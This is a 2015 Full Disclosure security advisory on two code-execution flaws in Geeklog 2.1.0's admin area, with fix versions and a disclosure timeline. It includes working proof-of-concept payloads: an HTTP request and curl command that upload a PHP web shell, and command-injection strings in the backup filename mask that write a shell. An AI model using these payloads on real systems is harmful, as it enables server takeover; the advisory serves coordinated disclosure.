[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0LtG3f-1aH9Ny2xT9-012rm2@mrelayeu.kundenserver.de>
Date: Mon, 07 Dec 2015 18:14:08 +0100
From: "Curesec Research Team (CRT)" <crt@...esec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Geeklog 2.1.0: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Geeklog 2.1.0
Fixed in: 2.1.1b3
Fixed Version Link: https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact: geeklog-security@...ts.geeklog.net
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 12/02/2015
Release mode: Coordinated release
CVE: requested, but not assigned
Credits Tim Coen of Curesec GmbH
2. Overview
The admin area of Geeklog suffers from two vulnerabilities that can lead to
code execution: OS Command Injection and Upload of Files with Dangerous Type.
The arbitrary file upload is already fixed in the beta version geeklog-2.1.1b1,
the OS command injection in version 2.1.1b3.
3. Upload of Files with Dangerous Type
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When uploading a file, the file type check is performed only client-side. An
attacker can easily bypass this check and thus upload files of dangerous types,
such as PHP files.
To upload files, an attacker needs a registered user that is in the group
"Filemanager Admin".
Proof of Concept
POST /geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Length: 761
Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773
Cookie: [cookies]
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="mode"
add
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="currentpath"
/var/www/geeklog-2.1.0/public_html/images/
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="filepath"
test.png
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="newfile"; filename="shell.php"
Content-Type: image/png
<?php passthru($_GET['x'])
-----------------------------10717364298700964751730232773
Content-Disposition: form-data; name="upload"
Upload
-----------------------------10717364298700964751730232773--
As curl command:
curl -i -s -k -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=---------------------------10717364298700964751730232773' \
-b 'gl_session=838973868; geeklog=2; password=18bdbd240593b81a5239285a1f56283b4ae20648;' \
--data-binary $'-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"mode\"\x0d\x0a\x0d\x0aadd\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"currentpath\"\x0d\x0a\x0d\x0a/var/www/geeklog-2.1.0/public_html/images/\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"filepath\"\x0d\x0a\x0d\x0atest.png\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"newfile\"; filename=\"shell.php\"\x0d\x0aContent-Type: image/png\x0d\x0a\x0d\x0a<?php passthru($_GET[\'x\'])\x0d\x0a-----------------------------10717364298700964751730232773\x0d\x0aContent-Disposition: form-data; name=\"upload\"\x0d\x0a\x0d\x0aUpload\x0d\x0a-----------------------------10717364298700964751730232773--\x0d\x0a' \
'http://localhost/geeklog-2.1.0/public_html/filemanager/connectors/php/filemanager.php'
4. OS Command Injection
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
When performing a database backup, various settings are passed unsanitized to
exec, leading to code execution.
To exploit this issue, an attacker needs a registered user that is in the group
"Root".
Proof of Concept
1. Change "Backup File Name Mask" in http://localhost/geeklog-2.1.0/public_html/admin/configuration.php?tab-5 to:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "<?php passthru(\$_GET['x']);" > shell.php;"
2. Perform database backup here:
http://localhost/geeklog-2.1.0/public_html/admin/database.php
The injected commands will be executed.
In the beta version geeklog-2.1.1b1, less-than is filtered out, but OS command
injection is still possible, including the creation of a PHP shell by appending
the injected PHP code to an existing PHP file without closing tags:
geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "passthru(\$_GET['x']);" >> ../filemanager/connectors/php/inc/wideimage/lib/Font/PS.php;"
Code
/admin/database.php
function dobackup()
{
[...]
if (!empty($_CONF['mysqldump_filename_mask'])) {
$filename_mask = strftime($_CONF['mysqldump_filename_mask']);
}
[...]
$backupfile = $_CONF['backup_path'] . $filename_mask;
[...]
$command .= " $_DB_name > \"$backupfile\"";
[...]
if ($canExec) {
exec($command);
5. Solution
To mitigate this issue please upgrade at least to version 2.1.1b3:
https://www.geeklog.net/filemgmt/visit.php/1156
Please note that a newer version might already be available.
6. Report Timeline
09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists